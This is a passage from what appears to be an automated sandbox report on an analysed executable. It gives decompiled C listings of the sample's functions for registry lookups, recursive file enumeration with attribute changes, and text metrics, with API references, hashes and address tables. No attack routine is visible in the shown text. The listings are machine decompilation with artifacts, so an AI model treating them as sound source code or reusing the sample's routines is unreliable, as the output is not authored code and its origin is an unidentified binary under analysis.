                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 47109696-1019749484
                                                            • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                            • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                            • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005C7A14(void* __eax, short* __ecx, void* __edx, void** _a4, int _a8, int _a12) {
				long _t7;
				short* _t8;
				void* _t9;
				int _t10;

				_t9 = __edx;
				_t8 = __ecx;
				_t10 = _a8;
				if(__eax == 2) {
					_t10 = _t10 | 0x00000100;
				}
				_t7 = RegOpenKeyExW(_t9, _t8, _a12, _t10, _a4); // executed
				return _t7;
			}







                                                            0x005c7a14
                                                            0x005c7a14
                                                            0x005c7a18
                                                            0x005c7a1d
                                                            0x005c7a1f
                                                            0x005c7a1f
                                                            0x005c7a30
                                                            0x005c7a37

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            Strings
                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                            • API String ID: 71445658-1109908249
                                                            • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                            • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                            • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E0060DCC8(signed int __eax, void* __ebx, char __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int _a16, signed int _a20, char _a24) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v17;
				intOrPtr _v24;
				char _v25;
				signed int _v26;
				void* _v32;
				struct _WIN32_FIND_DATAW _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				signed char _t106;
				signed char _t108;
				void* _t114;
				int _t122;
				signed int _t127;
				signed char _t135;
				signed char _t139;
				void* _t155;
				signed int _t158;
				intOrPtr _t177;
				intOrPtr _t187;
				void* _t201;
				void* _t202;
				intOrPtr _t203;

				_t159 = __ecx;
				_t201 = _t202;
				_t203 = _t202 + 0xfffffd84;
				_push(__ebx);
				_v640 = 0;
				_v636 = 0;
				_v632 = 0;
				_v628 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v25 = __ecx;
				_v24 = __edx;
				_v17 = __eax;
				_push(_t201);
				_push(0x60df66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t203;
				_v26 = 1;
				if(_a24 == 0) {
					L26:
					__eflags = _a16 & 0x000000ff ^ 0x00000001 | _v26;
					if((_a16 & 0x000000ff ^ 0x00000001 | _v26) != 0) {
						__eflags = _v25;
						if(_v25 != 0) {
							__eflags = _a12;
							if(__eflags == 0) {
								_t106 = E0060C664(_v17 & 0x000000ff, _v24, __eflags); // executed
								__eflags = _t106;
								if(_t106 == 0) {
									_v26 = 0;
								}
							} else {
								_t108 = _a12();
								__eflags = _t108;
								if(_t108 == 0) {
									_v26 = 0;
								}
							}
						}
					}
					__eflags = 0;
					_pop(_t177);
					 *[fs:eax] = _t177;
					_push(E0060DF6D);
					E0040A228( &_v640, 4);
					return E0040A228( &_v16, 3);
				} else {
					_t205 = _v25;
					if(_v25 == 0) {
						L3:
						_t207 = _v25;
						if(_v25 == 0) {
							E005C5428(_v24, _t159,  &_v8);
							E0040A5F0( &_v12, _v24);
						} else {
							E005C4EA4(_v24,  &_v8);
							E0040B4C8( &_v12, 0x60df84, _v8);
						}
						_t114 = E0060C2B0(_v17 & 0x000000ff,  &_v624, _v12, _t207); // executed
						_v32 = _t114;
						if(_v32 == 0xffffffff) {
							goto L26;
						} else {
							_push(_t201);
							_push(0x60def2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t203;
							do {
								E0040B318( &_v16, 0x104,  &(_v624.cFileName));
								E0040B660(_v16, 0x60df94);
								if(0 != 0) {
									_t127 = E0040B660(_v16, 0x60dfa4);
									if(0 != 0) {
										_t158 = _v624.dwFileAttributes;
										if((_t158 & 0x00000001) != 0 && (_t127 & 0xffffff00 | (_t158 & 0x00000010) == 0x00000000 | _a20) != 0) {
											E0040B4C8( &_v628, _v16, _v8);
											E0060C6DC(_v17 & 0x000000ff, _t158 & 0xfffffffe, _v628, _t158 & 0xfffffffe);
										}
										if((_v624.dwFileAttributes & 0x00000010) != 0) {
											__eflags = _a20;
											if(_a20 != 0) {
												E0040B4C8( &_v640, _v16, _v8);
												_t135 = E0060DCC8(_v17 & 0x000000ff, _t158, 1, _v640, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1); // executed
												__eflags = _t135;
												if(_t135 == 0) {
													_v26 = 0;
												}
											}
										} else {
											if(_a8 == 0) {
												E0040B4C8( &_v636, _v16, _v8);
												_t139 = E0060C158(_v17 & 0x000000ff, _v636, __eflags);
												__eflags = _t139;
												if(_t139 == 0) {
													_v26 = 0;
												}
											} else {
												E0040B4C8( &_v632, _v16, _v8);
												if(_a8() == 0) {
													_v26 = 0;
												}
											}
										}
									}
								}
								if(_a16 == 0 || _v26 != 0) {
									goto L24;
								}
								break;
								L24:
								_t122 = FindNextFileW(_v32,  &_v624); // executed
							} while (_t122 != 0);
							_pop(_t187);
							 *[fs:eax] = _t187;
							_push(E0060DEF9);
							return FindClose(_v32);
						}
					} else {
						_t155 = E0060C474(_v17 & 0x000000ff, _v24, _t205); // executed
						if(_t155 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
			}






























                                                            0x0060dcc8
                                                            0x0060dcc9
                                                            0x0060dccb
                                                            0x0060dcd1
                                                            0x0060dcd4
                                                            0x0060dcda
                                                            0x0060dce0
                                                            0x0060dce6
                                                            0x0060dcec
                                                            0x0060dcef
                                                            0x0060dcf2
                                                            0x0060dcf5
                                                            0x0060dcf8
                                                            0x0060dcfb
                                                            0x0060dd00
                                                            0x0060dd01
                                                            0x0060dd06
                                                            0x0060dd09
                                                            0x0060dd0c
                                                            0x0060dd14
                                                            0x0060def9
                                                            0x0060deff
                                                            0x0060df02
                                                            0x0060df04
                                                            0x0060df08
                                                            0x0060df0a
                                                            0x0060df0e
                                                            0x0060df2e
                                                            0x0060df33
                                                            0x0060df35
                                                            0x0060df37
                                                            0x0060df37
                                                            0x0060df10
                                                            0x0060df1a
                                                            0x0060df1d
                                                            0x0060df1f
                                                            0x0060df21
                                                            0x0060df21
                                                            0x0060df1f
                                                            0x0060df0e
                                                            0x0060df08
                                                            0x0060df3b
                                                            0x0060df3d
                                                            0x0060df40
                                                            0x0060df43
                                                            0x0060df53
                                                            0x0060df65
                                                            0x0060dd1a
                                                            0x0060dd1a
                                                            0x0060dd1e
                                                            0x0060dd34
                                                            0x0060dd34
                                                            0x0060dd38
                                                            0x0060dd5d
                                                            0x0060dd68
                                                            0x0060dd3a
                                                            0x0060dd40
                                                            0x0060dd50
                                                            0x0060dd50
                                                            0x0060dd7a
                                                            0x0060dd7f
                                                            0x0060dd86
                                                            0x00000000
                                                            0x0060dd8c
                                                            0x0060dd8e
                                                            0x0060dd8f
                                                            0x0060dd94
                                                            0x0060dd97
                                                            0x0060dd9a
                                                            0x0060dda8
                                                            0x0060ddb5
                                                            0x0060ddba
                                                            0x0060ddc8
                                                            0x0060ddcd
                                                            0x0060ddd3
                                                            0x0060dddc
                                                            0x0060ddf5
                                                            0x0060de09
                                                            0x0060de09
                                                            0x0060de15
                                                            0x0060de72
                                                            0x0060de76
                                                            0x0060de99
                                                            0x0060deaa
                                                            0x0060deaf
                                                            0x0060deb1
                                                            0x0060deb3
                                                            0x0060deb3
                                                            0x0060deb1
                                                            0x0060de17
                                                            0x0060de1b
                                                            0x0060de54
                                                            0x0060de63
                                                            0x0060de68
                                                            0x0060de6a
                                                            0x0060de6c
                                                            0x0060de6c
                                                            0x0060de1d
                                                            0x0060de29
                                                            0x0060de40
                                                            0x0060de42
                                                            0x0060de42
                                                            0x0060de40
                                                            0x0060de1b
                                                            0x0060de15
                                                            0x0060ddcd
                                                            0x0060debb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0060dec3
                                                            0x0060dece
                                                            0x0060ded3
                                                            0x0060dedd
                                                            0x0060dee0
                                                            0x0060dee3
                                                            0x0060def1
                                                            0x0060def1
                                                            0x0060dd20
                                                            0x0060dd27
                                                            0x0060dd2e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0060dd2e
                                                            0x0060dd1e

                                                            APIs
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                            • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID:
                                                            • API String ID: 2066263336-0
                                                            • Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                            • Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                            • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E005C77F4(void* __eax, void* __ebx, intOrPtr __ecx, short* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				short* _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				long _t46;
				signed int _t58;
				char _t66;
				intOrPtr _t82;
				void* _t87;
				signed int _t93;
				void* _t96;

				_v8 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_t87 = __eax;
				_push(_t96);
				_push(0x5c792a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96 + 0xffffffec;
				while(1) {
					_v24 = 0;
					_t46 = RegQueryValueExW(_t87, _v12, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 != 0 || _v20 != _a8 && _v20 != _a4) {
						break;
					}
					if(_v24 != 0) {
						__eflags = _v24 - 0x70000000;
						if(__eflags >= 0) {
							E00428FFC();
						}
						_t80 = _v24 + 1 >> 1;
						E0040A350( &_v8, _v24 + 1 >> 1, 0, __eflags);
						_t58 = RegQueryValueExW(_t87, _v12, 0,  &_v20, E0040A774( &_v8),  &_v24); // executed
						__eflags = _t58 - 0xea;
						if(_t58 == 0xea) {
							continue;
						} else {
							__eflags = _t58;
							if(_t58 != 0) {
								break;
							}
							__eflags = _v20 - _a8;
							if(_v20 == _a8) {
								L12:
								_t93 = _v24 >> 1;
								while(1) {
									__eflags = _t93;
									if(_t93 == 0) {
										break;
									}
									_t66 = _v8;
									__eflags =  *((short*)(_t66 + _t93 * 2 - 2));
									if( *((short*)(_t66 + _t93 * 2 - 2)) == 0) {
										_t93 = _t93 - 1;
										__eflags = _t93;
										continue;
									}
									break;
								}
								__eflags = _v20 - 7;
								if(_v20 == 7) {
									__eflags = _t93;
									if(_t93 != 0) {
										_t93 = _t93 + 1;
										__eflags = _t93;
									}
								}
								E0040B3F0( &_v8, _t80, _t93);
								__eflags = _v20 - 7;
								if(_v20 == 7) {
									__eflags = _t93;
									if(_t93 != 0) {
										(E0040A774( &_v8))[_t93 * 2 - 2] = 0;
									}
								}
								E0040A5A8(_v16, _v8);
								break;
							}
							__eflags = _v20 - _a4;
							if(_v20 != _a4) {
								break;
							}
							goto L12;
						}
					} else {
						E0040A1C8(_v16);
						break;
					}
				}
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E005C7931);
				return E0040A1C8( &_v8);
			}















                                                            0x005c77ff
                                                            0x005c7802
                                                            0x005c7805
                                                            0x005c7808
                                                            0x005c780c
                                                            0x005c780d
                                                            0x005c7812
                                                            0x005c7815
                                                            0x005c781a
                                                            0x005c781c
                                                            0x005c7830
                                                            0x005c7837
                                                            0x00000000
                                                            0x00000000
                                                            0x005c7855
                                                            0x005c7866
                                                            0x005c786d
                                                            0x005c786f
                                                            0x005c786f
                                                            0x005c787d
                                                            0x005c7881
                                                            0x005c789e
                                                            0x005c78a3
                                                            0x005c78a8
                                                            0x00000000
                                                            0x005c78ae
                                                            0x005c78ae
                                                            0x005c78b0
                                                            0x00000000
                                                            0x00000000
                                                            0x005c78b5
                                                            0x005c78b8
                                                            0x005c78c2
                                                            0x005c78c5
                                                            0x005c78ca
                                                            0x005c78ca
                                                            0x005c78cc
                                                            0x00000000
                                                            0x00000000
                                                            0x005c78ce
                                                            0x005c78d1
                                                            0x005c78d7
                                                            0x005c78c9
                                                            0x005c78c9
                                                            0x00000000
                                                            0x005c78c9
                                                            0x00000000
                                                            0x005c78d7
                                                            0x005c78d9
                                                            0x005c78dd
                                                            0x005c78df
                                                            0x005c78e1
                                                            0x005c78e3
                                                            0x005c78e3
                                                            0x005c78e3
                                                            0x005c78e1
                                                            0x005c78e9
                                                            0x005c78ee
                                                            0x005c78f2
                                                            0x005c78f4
                                                            0x005c78f6
                                                            0x005c7900
                                                            0x005c7900
                                                            0x005c78f6
                                                            0x005c790d
                                                            0x00000000
                                                            0x005c7912
                                                            0x005c78bd
                                                            0x005c78c0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x005c78c0
                                                            0x005c7857
                                                            0x005c785a
                                                            0x00000000
                                                            0x005c785f
                                                            0x005c7855
                                                            0x005c7916
                                                            0x005c7919
                                                            0x005c791c
                                                            0x005c7929

                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
                                                            • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
                                                            • Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
                                                            • Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005D0A74, Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E005D0A74(intOrPtr* __eax, void* __eflags, void* __fp0) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t68;
				int _t72;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t94;
				void* _t102;
				intOrPtr _t103;
				intOrPtr _t111;
				void* _t113;
				int _t114;
				void* _t116;
				void* _t121;
				void* _t123;
				intOrPtr _t124;
				void* _t126;

				_t126 = __eflags;
				_t121 = _t123;
				_t124 = _t123 + 0xffffffe8;
				_push(_t89);
				_push(_t116);
				_push(_t113);
				_v8 = __eax;
				_t94 =  *0x6cdb9c; // 0x6d66b8
				_t2 = _t94 + 0x2c; // 0x8
				_t103 =  *0x6cdb9c; // 0x6d66b8
				_t3 = _t103 + 8; // 0x0
				E005CE198( *((intOrPtr*)(_v8 + 0x74)), _t89,  *_t2,  *_t3, _t113, _t116, __fp0, 8, 0); // executed
				E005CE26C( *((intOrPtr*)(_v8 + 0x74)), _t89, _v8 + 0x3d4, _v8 + 0x3d0, _t113, _t116, _t126); // executed
				if( *(_v8 + 0x3d0) != 6) {
					L2:
					_v12 = E005D10C4(0, 1, _t113);
					 *[fs:eax] = _t124;
					E005D0564(_v8, _v12);
					E005CE3FC(_v8, 6,  *(_v8 + 0x3d0), _t128, 0xd,  *(_v8 + 0x3d4));
					 *((intOrPtr*)( *_v8 + 0x70))( *[fs:eax], 0x5d0bae, _t121);
					_t114 = _v20;
					_t68 = MulDiv(_t114,  *(_v8 + 0x3d0), 6);
					_t72 = MulDiv(_v16,  *(_v8 + 0x3d4), 0xd);
					E005AE564(_v8);
					 *((intOrPtr*)( *_v8 + 0xc8))(E005AE584(_v8), _t72 +  *((intOrPtr*)(_v8 + 0x5c)) - _v16, _t68 +  *((intOrPtr*)(_v8 + 0x58)) - _t114);
					_pop(_t111);
					_pop(_t102);
					 *[fs:eax] = _t111;
					_push(E005D0BB5);
					return E005D05DC( *_v8, _t102, _v12, 0);
				} else {
					_t88 = _v8;
					_t128 =  *((intOrPtr*)(_t88 + 0x3d4)) - 0xd;
					if( *((intOrPtr*)(_t88 + 0x3d4)) == 0xd) {
						return _t88;
					} else {
						goto L2;
					}
				}
			}



























                                                            0x005d0a74
                                                            0x005d0a75
                                                            0x005d0a77
                                                            0x005d0a7a
                                                            0x005d0a7b
                                                            0x005d0a7c
                                                            0x005d0a7d
                                                            0x005d0a84
                                                            0x005d0a8a
                                                            0x005d0a8d
                                                            0x005d0a93
                                                            0x005d0a9c
                                                            0x005d0ab9
                                                            0x005d0ac8
                                                            0x005d0ada
                                                            0x005d0ae8
                                                            0x005d0af6
                                                            0x005d0aff
                                                            0x005d0b21
                                                            0x005d0b2e
                                                            0x005d0b3d
                                                            0x005d0b41
                                                            0x005d0b58
                                                            0x005d0b82
                                                            0x005d0b8f
                                                            0x005d0b97
                                                            0x005d0b99
                                                            0x005d0b9a
                                                            0x005d0b9d
                                                            0x005d0bad
                                                            0x005d0aca
                                                            0x005d0aca
                                                            0x005d0acd
                                                            0x005d0ad4
                                                            0x005d0bbb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x005d0ad4

                                                            APIs
                                                              • Part of subcall function 005CE26C: GetDC.USER32(00000000), ref: 005CE27D
                                                              • Part of subcall function 005CE26C: SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                              • Part of subcall function 005CE26C: GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                              • Part of subcall function 005CE26C: GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                              • Part of subcall function 005CE26C: ReleaseDC.USER32 ref: 005CE2F2
                                                            • MulDiv.KERNEL32(006B66BF,00000006,00000006), ref: 005D0B41
                                                            • MulDiv.KERNEL32(?,?,0000000D), ref: 005D0B58
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Text$ExtentMetricsObjectPointReleaseSelect
                                                            • String ID:
                                                            • API String ID: 844173074-0
                                                            • Opcode ID: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
                                                            • Instruction ID: 4b3286446c155bbe1f679e64263f80cdfde84c69ba5731eb2fff00bff0d4e1b0
                                                            • Opcode Fuzzy Hash: 56f948a4803d8bda42e55077044f91e3e5fa0501c30f1b7e22e41dab0d924d4d
                                                            • Instruction Fuzzy Hash: 8F41E735A00108EFDB00DBA8D986EADB7F9FB88704F1541A6F904EB361D771AE41DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E0040E8BC(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				E0040A2AC(_v12);
				_push(_t84);
				_push(0x40e9d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E0040A1C8(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040E9DA);
					return E0040A228( &_v28, 6);
				}
				E0040A5F0( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040E5E0(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L0040524C();
						E0040DF90(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040E70C(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x6d1c10;
							if( *0x6d1c10 == 0) {
								L00405254();
								E0040DF90(_t46, _t60,  &_v28, _t79, _t81);
								E0040E70C(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040E7F0(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040E70C(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E0040B698(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                            0x0040e8bc
                                                            0x0040e8bc
                                                            0x0040e8bf
                                                            0x0040e8c1
                                                            0x0040e8c3
                                                            0x0040e8c5
                                                            0x0040e8c7
                                                            0x0040e8c9
                                                            0x0040e8cb
                                                            0x0040e8cc
                                                            0x0040e8cd
                                                            0x0040e8cf
                                                            0x0040e8d2
                                                            0x0040e8d8
                                                            0x0040e8e0
                                                            0x0040e8e7
                                                            0x0040e8e8
                                                            0x0040e8ed
                                                            0x0040e8f0
                                                            0x0040e8f5
                                                            0x0040e8fe
                                                            0x0040e9b8
                                                            0x0040e9ba
                                                            0x0040e9bd
                                                            0x0040e9c0
                                                            0x0040e9d2
                                                            0x0040e9d2
                                                            0x0040e90a
                                                            0x0040e90f
                                                            0x0040e914
                                                            0x0040e919
                                                            0x0040e919
                                                            0x0040e91b
                                                            0x0040e920
                                                            0x0040e947
                                                            0x0040e94d
                                                            0x0040e956
                                                            0x0040e967
                                                            0x0040e96f
                                                            0x0040e97c
                                                            0x0040e981
                                                            0x0040e984
                                                            0x0040e986
                                                            0x0040e98d
                                                            0x0040e98f
                                                            0x0040e997
                                                            0x0040e9a4
                                                            0x0040e9a4
                                                            0x0040e98d
